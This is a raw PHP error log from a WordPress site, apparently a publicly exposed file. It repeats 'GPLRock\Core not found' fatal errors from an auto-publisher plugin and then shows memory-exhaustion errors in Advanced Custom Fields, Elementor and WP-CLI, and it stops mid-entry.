/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 00:52:00 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 00:52:02 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 00:52:05 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(31): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 00:58:32 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [17-Apr-2026 03:59:34 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-blog-header.php(13): require_once('/home/masterro/...') #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/index.php(17): require('/home/masterro/...') #8 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [18-Apr-2026 00:20:44 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(51): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [18-Apr-2026 00:20:48 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [18-Apr-2026 00:20:49 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(51): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [18-Apr-2026 00:26:00 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [19-Apr-2026 00:21:19 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(51): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [19-Apr-2026 00:21:23 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [19-Apr-2026 00:21:24 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): WP_CLI\Runner->{closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1394): require('/home/masterro/...') #5 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Runner.php(1313): WP_CLI\Runner->load_wordpress() #6 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/WP_CLI/Bootstrap/LaunchRunner.php(28): WP_CLI\Runner->start() #7 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/bootstrap.php(84): WP_CLI\Bootstrap\LaunchRunner->process() #8 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/wp-cli.php(35): WP_CLI\bootstrap() #9 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/wp-cli/php/boot-fs.php(17): require_once('/usr/local/cpan...') #10 /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/wpt-wp-cli.php(51): require_once('/usr/local/cpan...') #11 Command line code(1): require('/usr/local/cpan...') #12 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [19-Apr-2026 00:26:54 UTC] PHP Fatal error: Uncaught Error: Class "GPLRock\Core" not found in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php:110 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): {closure}() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-settings.php(593): do_action() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-config.php(104): require_once('/home/masterro/...') #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-load.php(50): require_once('/home/masterro/...') #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(46): require_once('/home/masterro/...') #7 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/gplrock-auto-publisher/gplrock-auto-publisher.php on line 110 [20-May-2026 21:41:08 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 592 [20-May-2026 21:41:08 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 620 [21-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [21-May-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [21-May-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-May-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 591 [22-May-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [22-May-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [22-May-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 620 [23-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/ajax/module.php on line 113 [23-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 621 [24-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-May-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/connect/module.php on line 43 [24-May-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 592 [25-May-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/elementor/core/common/modules/ajax/module.php on line 113 [25-May-2026 21:40:29 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 620 [26-May-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-May-2026 